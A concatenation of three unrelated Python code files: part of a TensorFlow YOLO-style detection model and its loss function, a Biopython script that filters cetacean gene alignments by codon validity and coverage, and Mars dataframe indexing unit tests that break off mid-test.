"""
#ChangeStart
'''
conv_num = 1
temp_conv = self.conv2d('conv' + str(conv_num), images, [3, 3, 3, 16], stride=1)
conv_num += 1
temp_pool = self.max_pool(temp_conv, [2, 2], 2)
temp_conv = self.conv2d('conv' + str(conv_num), temp_pool, [3, 3, 16, 32], stride=1)
conv_num += 1
temp_pool = self.max_pool(temp_conv, [2, 2], 2)
temp_conv = self.conv2d('conv' + str(conv_num), temp_pool, [3, 3, 32, 64], stride=1)
conv_num += 1
temp_conv = self.max_pool(temp_conv, [2, 2], 2)
temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 64, 128], stride=1)
conv_num += 1
temp_conv = self.max_pool(temp_conv, [2, 2], 2)
temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 128, 256], stride=1)
conv_num += 1
temp_conv = self.max_pool(temp_conv, [2, 2], 2)
temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 256, 512], stride=1)
conv_num += 1
temp_conv = self.max_pool(temp_conv, [2, 2], 2)
temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 512, 1024], stride=1)
conv_num += 1
temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 1024, 1024], stride=1)
conv_num += 1
temp_conv = self.conv2d('conv' + str(conv_num), temp_conv, [3, 3, 1024, 1024], stride=1)
conv_num += 1
'''
temp_conv = ResModel.resnet(images,20)
#ChangeENd
temp_conv = tf.transpose(temp_conv, (0, 3, 1, 2))
#Fully connected layer
'''
print 'delete Fully'
local2 = self.local('local2', temp_conv,self.cell_size * self.cell_size * 1024, 4096)
'''
local1 = self.local('local1', temp_conv, self.cell_size * self.cell_size * 1024, 2048)
local2 = self.local('local2', local1, 2048, 4096)
local3 = self.local('local3', local2, 4096, self.cell_size * self.cell_size * (self.num_classes + self.boxes_per_cell * 5), leaky=False, pretrain=False, train=True)
n1 = self.cell_size * self.cell_size * self.num_classes
n2 = n1 + self.cell_size * self.cell_size * self.boxes_per_cell
class_probs = tf.reshape(local3[:, 0:n1], (-1, self.cell_size, self.cell_size, self.num_classes))
scales = tf.reshape(local3[:, n1:n2], (-1, self.cell_size, self.cell_size, self.boxes_per_cell))
boxes = tf.reshape(local3[:, n2:], (-1, self.cell_size, self.cell_size, self.boxes_per_cell * 4))
local3 = tf.concat(3,[class_probs, scales, boxes])
predicts = local3
return predicts
def iou(self, boxes1, boxes2):
"""calculate ious
Args:
boxes1: 4-D tensor [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL, 4] ====> (x_center, y_center, w, h)
boxes2: 1-D tensor [4] ===> (x_center, y_center, w, h)
Return:
iou: 3-D tensor [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL]
"""
boxes1 = tf.pack([boxes1[:, :, :, 0] - boxes1[:, :, :, 2] / 2, boxes1[:, :, :, 1] - boxes1[:, :, :, 3] / 2,
boxes1[:, :, :, 0] + boxes1[:, :, :, 2] / 2, boxes1[:, :, :, 1] + boxes1[:, :, :, 3] / 2])
boxes1 = tf.transpose(boxes1, [1, 2, 3, 0])
boxes2 = tf.pack([boxes2[0] - boxes2[2] / 2, boxes2[1] - boxes2[3] / 2,
boxes2[0] + boxes2[2] / 2, boxes2[1] + boxes2[3] / 2])
#calculate the left up point
lu = tf.maximum(boxes1[:, :, :, 0:2], boxes2[0:2])
rd = tf.minimum(boxes1[:, :, :, 2:], boxes2[2:])
#intersection
intersection = rd - lu
inter_square = intersection[:, :, :, 0] * intersection[:, :, :, 1]
mask = tf.cast(intersection[:, :, :, 0] > 0, tf.float32) * tf.cast(intersection[:, :, :, 1] > 0, tf.float32)
inter_square = mask * inter_square
#calculate the boxs1 square and boxs2 square
square1 = (boxes1[:, :, :, 2] - boxes1[:, :, :, 0]) * (boxes1[:, :, :, 3] - boxes1[:, :, :, 1])
square2 = (boxes2[2] - boxes2[0]) * (boxes2[3] - boxes2[1])
return inter_square/(square1 + square2 - inter_square + 1e-6)
def cond1(self, num, object_num, loss, predict, label, nilboy):
"""
if num < object_num
"""
return num < object_num
def body1(self, num, object_num, loss, predict, labels, nilboy):
"""
calculate loss
Args:
predict: 3-D tensor [cell_size, cell_size, 5 * boxes_per_cell]
labels : [max_objects, 5] (x_center, y_center, w, h, class)
"""
label = labels[num:num+1, :]
label = tf.reshape(label, [-1])
#calculate objects tensor [CELL_SIZE, CELL_SIZE]
min_x = (label[0] - label[2] / 2) / (self.image_size / self.cell_size)
max_x = (label[0] + label[2] / 2) / (self.image_size / self.cell_size)
min_y = (label[1] - label[3] / 2) / (self.image_size / self.cell_size)
max_y = (label[1] + label[3] / 2) / (self.image_size / self.cell_size)
min_x = tf.floor(min_x)
min_y = tf.floor(min_y)
max_x = tf.ceil(max_x)
max_y = tf.ceil(max_y)
temp = tf.cast(tf.pack([max_y - min_y, max_x - min_x]), dtype=tf.int32)
objects = tf.ones(temp, tf.float32)
temp = tf.cast(tf.pack([min_y, self.cell_size - max_y, min_x, self.cell_size - max_x]), tf.int32)
temp = tf.reshape(temp, (2, 2))
objects = tf.pad(objects, temp, "CONSTANT")
#calculate objects tensor [CELL_SIZE, CELL_SIZE]
#calculate responsible tensor [CELL_SIZE, CELL_SIZE]
center_x = label[0] / (self.image_size / self.cell_size)
center_x = tf.floor(center_x)
center_y = label[1] / (self.image_size / self.cell_size)
center_y = tf.floor(center_y)
response = tf.ones([1, 1], tf.float32)
temp = tf.cast(tf.pack([center_y, self.cell_size - center_y - 1, center_x, self.cell_size -center_x - 1]), tf.int32)
temp = tf.reshape(temp, (2, 2))
response = tf.pad(response, temp, "CONSTANT")
#objects = response
#calculate iou_predict_truth [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL]
predict_boxes = predict[:, :, self.num_classes + self.boxes_per_cell:]
predict_boxes = tf.reshape(predict_boxes, [self.cell_size, self.cell_size, self.boxes_per_cell, 4])
predict_boxes = predict_boxes * [self.image_size / self.cell_size, self.image_size / self.cell_size, self.image_size, self.image_size]
base_boxes = np.zeros([self.cell_size, self.cell_size, 4])
for y in range(self.cell_size):
for x in range(self.cell_size):
#nilboy
base_boxes[y, x, :] = [self.image_size / self.cell_size * x, self.image_size / self.cell_size * y, 0, 0]
base_boxes = np.tile(np.resize(base_boxes, [self.cell_size, self.cell_size, 1, 4]), [1, 1, self.boxes_per_cell, 1])
predict_boxes = base_boxes + predict_boxes
iou_predict_truth = self.iou(predict_boxes, label[0:4])
#calculate C [cell_size, cell_size, boxes_per_cell]
C = iou_predict_truth * tf.reshape(response, [self.cell_size, self.cell_size, 1])
#calculate I tensor [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL]
I = iou_predict_truth * tf.reshape(response, (self.cell_size, self.cell_size, 1))
max_I = tf.reduce_max(I, 2, keep_dims=True)
I = tf.cast((I >= max_I), tf.float32) * tf.reshape(response, (self.cell_size, self.cell_size, 1))
#calculate no_I tensor [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL]
no_I = tf.ones_like(I, dtype=tf.float32) - I
p_C = predict[:, :, self.num_classes:self.num_classes + self.boxes_per_cell]
#calculate truth x,y,sqrt_w,sqrt_h 0-D
x = label[0]
y = label[1]
sqrt_w = tf.sqrt(tf.abs(label[2]))
sqrt_h = tf.sqrt(tf.abs(label[3]))
#sqrt_w = tf.abs(label[2])
#sqrt_h = tf.abs(label[3])
#calculate predict p_x, p_y, p_sqrt_w, p_sqrt_h 3-D [CELL_SIZE, CELL_SIZE, BOXES_PER_CELL]
p_x = predict_boxes[:, :, :, 0]
p_y = predict_boxes[:, :, :, 1]
#p_sqrt_w = tf.sqrt(tf.abs(predict_boxes[:, :, :, 2])) * ((tf.cast(predict_boxes[:, :, :, 2] > 0, tf.float32) * 2) - 1)
#p_sqrt_h = tf.sqrt(tf.abs(predict_boxes[:, :, :, 3])) * ((tf.cast(predict_boxes[:, :, :, 3] > 0, tf.float32) * 2) - 1)
#p_sqrt_w = tf.sqrt(tf.maximum(0.0, predict_boxes[:, :, :, 2]))
#p_sqrt_h = tf.sqrt(tf.maximum(0.0, predict_boxes[:, :, :, 3]))
#p_sqrt_w = predict_boxes[:, :, :, 2]
#p_sqrt_h = predict_boxes[:, :, :, 3]
p_sqrt_w = tf.sqrt(tf.minimum(self.image_size * 1.0, tf.maximum(0.0, predict_boxes[:, :, :, 2])))
p_sqrt_h = tf.sqrt(tf.minimum(self.image_size * 1.0, tf.maximum(0.0, predict_boxes[:, :, :, 3])))
#calculate truth p 1-D tensor [NUM_CLASSES]
P = tf.one_hot(tf.cast(label[4], tf.int32), self.num_classes, dtype=tf.float32)
#calculate predict p_P 3-D tensor [CELL_SIZE, CELL_SIZE, NUM_CLASSES]
p_P = predict[:, :, 0:self.num_classes]
#class_loss
class_loss = tf.nn.l2_loss(tf.reshape(objects, (self.cell_size, self.cell_size, 1)) * (p_P - P)) * self.class_scale
#class_loss = tf.nn.l2_loss(tf.reshape(response, (self.cell_size, self.cell_size, 1)) * (p_P - P)) * self.class_scale
#object_loss
object_loss = tf.nn.l2_loss(I * (p_C - C)) * self.object_scale
#object_loss = tf.nn.l2_loss(I * (p_C - (C + 1.0)/2.0)) * self.object_scale
#noobject_loss
#noobject_loss = tf.nn.l2_loss(no_I * (p_C - C)) * self.noobject_scale
noobject_loss = tf.nn.l2_loss(no_I * (p_C)) * self.noobject_scale
#coord_loss
coord_loss = (tf.nn.l2_loss(I * (p_x - x)/(self.image_size/self.cell_size)) +
tf.nn.l2_loss(I * (p_y - y)/(self.image_size/self.cell_size)) +
tf.nn.l2_loss(I * (p_sqrt_w - sqrt_w))/ self.image_size +
tf.nn.l2_loss(I * (p_sqrt_h - sqrt_h))/self.image_size) * self.coord_scale
nilboy = I
return num + 1, object_num, [loss[0] + class_loss, loss[1] + object_loss, loss[2] + noobject_loss, loss[3] + coord_loss], predict, labels, nilboy
def loss(self, predicts, labels, objects_num):
"""Add Loss to all the trainable variables
Args:
predicts: 4-D tensor [batch_size, cell_size, cell_size, 5 * boxes_per_cell]
===> (num_classes, boxes_per_cell, 4 * boxes_per_cell)
labels : 3-D tensor of [batch_size, max_objects, 5]
objects_num: 1-D tensor [batch_size]
"""
class_loss = tf.constant(0, tf.float32)
object_loss = tf.constant(0, tf.float32)
noobject_loss = tf.constant(0, tf.float32)
coord_loss = tf.constant(0, tf.float32)
loss = [0, 0, 0, 0]
for i in range(self.batch_size):
predict = predicts[i, :, :, :]
label = labels[i, :, :]
object_num = objects_num[i]
nilboy = tf.ones([7,7,2])
tuple_results = tf.while_loop(self.cond1, self.body1, [tf.constant(0), object_num, [class_loss, object_loss, noobject_loss, coord_loss], predict, label, nilboy])
for j in range(4):
loss[j] = loss[j] + tuple_results[2][j]
nilboy = tuple_results[5]
tf.add_to_collection('losses', (loss[0] + loss[1] + loss[2] + loss[3])/self.batch_size)
tf.summary.scalar('class_loss', loss[0]/self.batch_size)
tf.summary.scalar('object_loss', loss[1]/self.batch_size)
tf.summary.scalar('noobject_loss', loss[2]/self.batch_size)
tf.summary.scalar('coord_loss', loss[3]/self.batch_size)
tf.summary.scalar('weight_loss', tf.add_n(tf.get_collection('losses')) - (loss[0] + loss[1] + loss[2] + loss[3])/self.batch_size )
return tf.add_n(tf.get_collection('losses'), name='total_loss'), nilboy
|
#!python3
import pandas as pd
import numpy as np
import os
from Bio import AlignIO
from Bio.Alphabet.IUPAC import IUPACUnambiguousDNA
from Bio.Data.CodonTable import TranslationError
from ete3 import Tree
f = os.path.abspath('..') + "/DataEmpirical/Cetacea"
phy = AlignIO.read("{0}/datadryad/DATASET_B.phylip".format(f), format="phylip-relaxed", alphabet=IUPACUnambiguousDNA())
print("{0} taxa.".format(len(phy)))
taxa = Tree("{0}/rootedtree.nhx".format(f), format=1).get_leaf_names()
precision_dict = {}
coverage_dict = {}
with open("{0}/datadryad/Cetacea_gene_partition.txt".format(f), "r") as gene_partition:
for line in gene_partition:
name, pos = line.replace("DNA,", "").replace(" ", "").split("=")
down, up = pos.split("-")
down, up = int(down), int(up)
diff = 1 + up - down
if diff % 3 != 0:
continue
sequences = phy[:, down - 1:up]
output = phy[:, :0]
filtered = [rec for rec in sequences if rec.id in taxa]
for pos in range(0, int(diff / 3)):
keep_site = True
for sr in filtered:
site = sr.seq[pos * 3:(pos + 1) * 3]
try:
site.translate(gap="-")
except TranslationError:
try:
site.translate(gap="?")
except TranslationError:
keep_site = False
break
if keep_site:
output += phy[:, pos * 3:(pos + 1) * 3]
seq_size = len(output[0])
if seq_size < 10:
continue
precision_dict[name] = seq_size / diff
ids_seqs = {fasta.id: str(fasta.seq) for fasta in output if (fasta.id in taxa)}
seqs_cov = {k: (len(v) - v.count("-") - v.count("?")) / len(v) for k, v in ids_seqs.items()}
for k, v in seqs_cov.items():
if v == 0:
print("Removing " + k)
ids_seqs.pop(k)
coverage_dict[name] = sum(seqs_cov.values()) / len(ids_seqs)
assert(len(set([len(s) for s in ids_seqs.values()])) == 1)
ali_file = open("{0}/singlegene_alignments/{1}.ali".format(f, name), 'w')
ali_file.write("{0} {1}\n".format(len(ids_seqs), seq_size))
ali_file.write("\n".join([" ".join(k_v) for k_v in ids_seqs.items()]))
ali_file.close()
print("{0}: {1:.1f}% acc; {2:.1f}% cov".format(name, precision_dict[name] * 100, coverage_dict[name] * 100))
for precision in np.arange(0.9, 1.0, 0.02):
for coverage in np.arange(0.7, 1.0, 0.05):
cds = [k for k, v in precision_dict.items() if v >= precision and coverage_dict[k] > coverage]
print("{0} CDS are with a acc > {1} and coverage > {2}.".format(len(cds), precision, coverage))
filename = f + "/cds.{0}acc.{1}cov.list".format("{0:.2f}".format(precision).split('.')[1],
"{0:.2f}".format(coverage).split('.')[1])
pd.DataFrame(cds).to_csv(filename, index=False, header=None)
print("{0} CDS saved into '{1}'".format(len(cds), filename))
|
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pandas as pd
import pytest
import mars.dataframe as md
import mars.tensor as mt
from mars.core import tile
from mars.tensor.core import TENSOR_CHUNK_TYPE, TENSOR_TYPE, Tensor
from mars.dataframe.core import SERIES_CHUNK_TYPE, SERIES_TYPE, Series, \
DATAFRAME_TYPE, DataFrame, DATAFRAME_CHUNK_TYPE
from mars.dataframe.indexing.iloc import DataFrameIlocGetItem, DataFrameIlocSetItem, \
IndexingError, HeadTailOptimizedOperandMixin
from mars.dataframe.indexing.loc import DataFrameLocGetItem
def test_set_index():
df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df2 = md.DataFrame(df1, chunk_size=2)
df3 = df2.set_index('y', drop=True)
df3 = tile(df3)
assert df3.chunk_shape == (2, 2)
pd.testing.assert_index_equal(df3.chunks[0].columns_value.to_pandas(), pd.Index(['x']))
pd.testing.assert_index_equal(df3.chunks[1].columns_value.to_pandas(), pd.Index(['z']))
df4 = df2.set_index('y', drop=False)
df4 = tile(df4)
assert df4.chunk_shape == (2, 2)
pd.testing.assert_index_equal(df4.chunks[0].columns_value.to_pandas(), pd.Index(['x', 'y']))
pd.testing.assert_index_equal(df4.chunks[1].columns_value.to_pandas(), pd.Index(['z']))
def test_iloc_getitem():
df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df2 = md.DataFrame(df1, chunk_size=2)
with pytest.raises(IndexingError):
_ = df2.iloc[1, 1, 1]
# index cannot be tuple
with pytest.raises(IndexingError):
_ = df2.iloc[(1,), ]
# index wrong type
with pytest.raises(TypeError):
_ = df2.iloc['a1':]
with pytest.raises(NotImplementedError):
_ = df2.iloc[0, md.Series(['a2', 'a3'])]
# fancy index should be 1-d
with pytest.raises(ValueError):
_ = df2.iloc[[[0, 1], [1, 2]]]
with pytest.raises(ValueError):
_ = df2.iloc[1, ...]
with pytest.raises(IndexError):
_ = df2.iloc[-4]
with pytest.raises(IndexError):
_ = df2.iloc[3]
# plain index
df3 = df2.iloc[1]
df3 = tile(df3)
assert isinstance(df3, SERIES_TYPE)
assert isinstance(df3.op, DataFrameIlocGetItem)
assert df3.shape == (3,)
assert df3.chunk_shape == (2,)
assert df3.chunks[0].shape == (2,)
assert df3.chunks[1].shape == (1,)
assert df3.chunks[0].op.indexes == [1, slice(None, None, None)]
assert df3.chunks[1].op.indexes == [1, slice(None, None, None)]
assert df3.chunks[0].inputs[0].index == (0, 0)
assert df3.chunks[0].inputs[0].shape == (2, 2)
assert df3.chunks[1].inputs[0].index == (0, 1)
assert df3.chunks[1].inputs[0].shape == (2, 1)
# slice index
df4 = df2.iloc[:, 2:4]
df4 = tile(df4)
assert isinstance(df4, DATAFRAME_TYPE)
assert isinstance(df4.op, DataFrameIlocGetItem)
assert df4.shape == (3, 1)
assert df4.chunk_shape == (2, 1)
assert df4.chunks[0].shape == (2, 1)
pd.testing.assert_index_equal(df4.chunks[0].columns_value.to_pandas(), df1.columns[2:3])
pd.testing.assert_series_equal(df4.chunks[0].dtypes, df1.dtypes[2:3])
assert isinstance(df4.chunks[0].index_value.to_pandas(), type(df1.index))
assert df4.chunks[1].shape == (1, 1)
pd.testing.assert_index_equal(df4.chunks[1].columns_value.to_pandas(), df1.columns[2:3])
pd.testing.assert_series_equal(df4.chunks[1].dtypes, df1.dtypes[2:3])
assert df4.chunks[0].index_value.key != df4.chunks[1].index_value.key
assert isinstance(df4.chunks[1].index_value.to_pandas(), type(df1.index))
assert df4.chunks[0].op.indexes == [slice(None, None, None), slice(None, None, None)]
assert df4.chunks[1].op.indexes == [slice(None, None, None), slice(None, None, None)]
assert df4.chunks[0].inputs[0].index == (0, 1)
assert df4.chunks[0].inputs[0].shape == (2, 1)
assert df4.chunks[1].inputs[0].index == (1, 1)
assert df4.chunks[1].inputs[0].shape == (1, 1)
# plain fancy index
df5 = df2.iloc[[0], [0, 1, 2]]
df5 = tile(df5)
assert isinstance(df5, DATAFRAME_TYPE)
assert isinstance(df5.op, DataFrameIlocGetItem)
assert df5.shape == (1, 3)
assert df5.chunk_shape == (1, 2)
assert df5.chunks[0].shape == (1, 2)
pd.testing.assert_index_equal(df5.chunks[0].columns_value.to_pandas(), df1.columns[:2])
pd.testing.assert_series_equal(df5.chunks[0].dtypes, df1.dtypes[:2])
assert isinstance(df5.chunks[0].index_value.to_pandas(), type(df1.index))
assert df5.chunks[1].shape == (1, 1)
pd.testing.assert_index_equal(df5.chunks[1].columns_value.to_pandas(), df1.columns[2:])
pd.testing.assert_series_equal(df5.chunks[1].dtypes, df1.dtypes[2:])
assert isinstance(df5.chunks[1].index_value.to_pandas(), type(df1.index))
np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])
assert df5.chunks[0].inputs[0].index == (0, 0)
assert df5.chunks[0].inputs[0].shape == (2, 2)
assert df5.chunks[1].inputs[0].index == (0, 1)
assert df5.chunks[1].inputs[0].shape == (2, 1)
# fancy index
df6 = df2.iloc[[1, 2], [0, 1, 2]]
df6 = tile(df6)
assert isinstance(df6, DATAFRAME_TYPE)
assert isinstance(df6.op, DataFrameIlocGetItem)
assert df6.shape == (2, 3)
assert df6.chunk_shape == (2, 2)
assert df6.chunks[0].shape == (1, 2)
assert df6.chunks[1].shape == (1, 1)
assert df6.chunks[2].shape == (1, 2)
assert df6.chunks[3].shape == (1, 1)
np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])
assert df6.chunks[0].inputs[0].index == (0, 0)
assert df6.chunks[0].inputs[0].shape == (2, 2)
assert df6.chunks[1].inputs[0].index == (0, 1)
assert df6.chunks[1].inputs[0].shape == (2, 1)
assert df6.chunks[2].inputs[0].index == (1, 0)
assert df6.chunks[2].inputs[0].shape == (1, 2)
assert df6.chunks[3].inputs[0].index == (1, 1)
assert df6.chunks[3].inputs[0].shape == (1, 1)
# plain index
df7 = df2.iloc[1, 2]
df7 = tile(df7)
assert isinstance(df7, TENSOR_TYPE) # scalar
assert isinstance(df7.op, DataFrameIlocGetItem)
assert df7.shape == ()
assert df7.chunk_shape == ()
assert df7.chunks[0].dtype == df7.dtype
assert df7.chunks[0].shape == ()
assert df7.chunks[0].op.indexes == [1, 0]
assert df7.chunks[0].inputs[0].index == (0, 1)
assert df7.chunks[0].inputs[0].shape == (2, 1)
# test Series iloc getitem
# slice
series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[4:8]
series = tile(series)
assert series.shape == (4,)
assert len(series.chunks) == 2
assert series.chunks[0].shape == (2,)
assert series.chunks[0].index == (0,)
assert series.chunks[0].op.indexes == [slice(1, 3, 1),]
assert series.chunks[1].shape == (2,)
assert series.chunks[1].op.indexes == [slice(0, 2, 1),]
assert series.chunks[1].index == (1,)
# fancy index
series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[[2, 4, 8]]
series = tile(series)
assert series.shape == (3,)
assert len(series.chunks) == 3
assert series.chunks[0].shape == (1,)
assert series.chunks[0].index == (0,)
assert series.chunks[0].op.indexes[0] == [2]
assert series.chunks[1].shape == (1,)
assert series.chunks[1].op.indexes[0] == [1]
assert series.chunks[1].index == (1,)
assert series.chunks[2].shape == (1,)
assert series.chunks[2].op.indexes[0] == [2]
assert series.chunks[2].index == (2,)
def test_iloc_setitem():
df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df2 = md.DataFrame(df1, chunk_size=2)
df2 = tile(df2)
# plain index
df3 = md.DataFrame(df1, chunk_size=2)
df3.iloc[1] = 100
df3 = tile(df3)
assert isinstance(df3.op, DataFrameIlocSetItem)
assert df3.chunk_shape == df2.chunk_shape
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df3.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df3.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df3.chunks):
assert c1.shape == c2.shape
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
assert c1.key == c2.inputs[0].key
else:
assert c1.key == c2.key
assert df3.chunks[0].op.indexes == [1, slice(None, None, None)]
assert df3.chunks[1].op.indexes == [1, slice(None, None, None)]
# # slice index
df4 = md.DataFrame(df1, chunk_size=2)
df4.iloc[:, 2:4] = 1111
df4 = tile(df4)
assert isinstance(df4.op, DataFrameIlocSetItem)
assert df4.chunk_shape == df2.chunk_shape
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df4.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df4.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df4.chunks):
assert c1.shape == c2.shape
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
assert c1.key == c2.inputs[0].key
else:
assert c1.key == c2.key
assert df4.chunks[1].op.indexes == [slice(None, None, None), slice(None, None, None)]
assert df4.chunks[3].op.indexes == [slice(None, None, None), slice(None, None, None)]
# plain fancy index
df5 = md.DataFrame(df1, chunk_size=2)
df5.iloc[[0], [0, 1, 2]] = 2222
df5 = tile(df5)
assert isinstance(df5.op, DataFrameIlocSetItem)
assert df5.chunk_shape == df2.chunk_shape
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df5.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df5.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df5.chunks):
assert c1.shape == c2.shape
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
assert c1.key == c2.inputs[0].key
else:
assert c1.key == c2.key
np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])
# fancy index
df6 = md.DataFrame(df1, chunk_size=2)
df6.iloc[[1, 2], [0, 1, 2]] = 3333
df6 = tile(df6)
assert isinstance(df6.op, DataFrameIlocSetItem)
assert df6.chunk_shape == df2.chunk_shape
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df6.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df6.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df6.chunks):
assert c1.shape == c2.shape
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
assert c1.key == c2.inputs[0].key
else:
assert c1.key == c2.key
np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])
# plain index
df7 = md.DataFrame(df1, chunk_size=2)
df7.iloc[1, 2] = 4444
df7 = tile(df7)
assert isinstance(df7.op, DataFrameIlocSetItem)
assert df7.chunk_shape == df2.chunk_shape
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df7.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df7.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df7.chunks):
assert c1.shape == c2.shape
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
assert c1.key == c2.inputs[0].key
else:
assert c1.key == c2.key
assert df7.chunks[1].op.indexes == [1, 0]
# test Series
# slice
series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
series.iloc[:4] = 2
series = tile(series)
assert series.shape == (10,)
assert len(series.chunks) == 4
assert series.chunks[0].op.indexes == [slice(None, None, None), ]
assert series.chunks[0].op.value == 2
assert series.chunks[1].op.indexes == [slice(0, 1, 1), ]
assert series.chunks[1].op.value == 2
# fancy index
series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
series.iloc[[2, 4, 9]] = 3
series = tile(series)
assert series.shape == (10,)
assert len(series.chunks) == 4
assert series.chunks[0].index == (0,)
assert series.chunks[0].op.indexes[0].tolist() == [2]
assert series.chunks[0].op.value == 3
assert series.chunks[1].index == (1,)
assert series.chunks[1].op.indexes[0].tolist() == [1]
assert series.chunks[1].op.value == 3
assert series.chunks[3].index == (3,)
assert series.chunks[3].op.indexes[0].tolist() == [0]
assert series.chunks[3].op.value == 3
def test_dataframe_loc():
raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df = md.DataFrame(raw, chunk_size=2)
raw2 = raw.copy()
raw2.reset_index(inplace=True, drop=True)
df3 = md.DataFrame(raw2, chunk_size=2)
s = pd.Series([1, 3, 5], index=['a1', 'a2', 'a3'])
series = md.Series(s, chunk_size=2)
# test return scalar
df2 = df.loc['a1', 'z']
assert isinstance(df2, Tensor)
assert df2.shape == ()
assert df2.dtype == raw['z'].dtype
df2 = tile(df2)
assert len(df2.chunks) == 1
assert isinstance(df2.chunks[0], TENSOR_CHUNK_TYPE)
# test return series for index axis
df2 = df.loc[:, 'y']
assert isinstance(df2, Series)
assert df2.shape == (3,)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
assert df2.name == 'y'
df2 = tile(df2)
assert len(df2.chunks) == 2
for c in df2.chunks:
assert isinstance(c, SERIES_CHUNK_TYPE)
assert isinstance(c.index_value.to_pandas(), type(raw.index))
assert c.name == 'y'
assert c.dtype == raw['y'].dtype
# test return series for column axis
df2 = df.loc['a2', :]
assert isinstance(df2, Series)
assert df2.shape == (3,)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.columns_value.to_pandas())
assert df2.name == 'a2'
df2 = tile(df2)
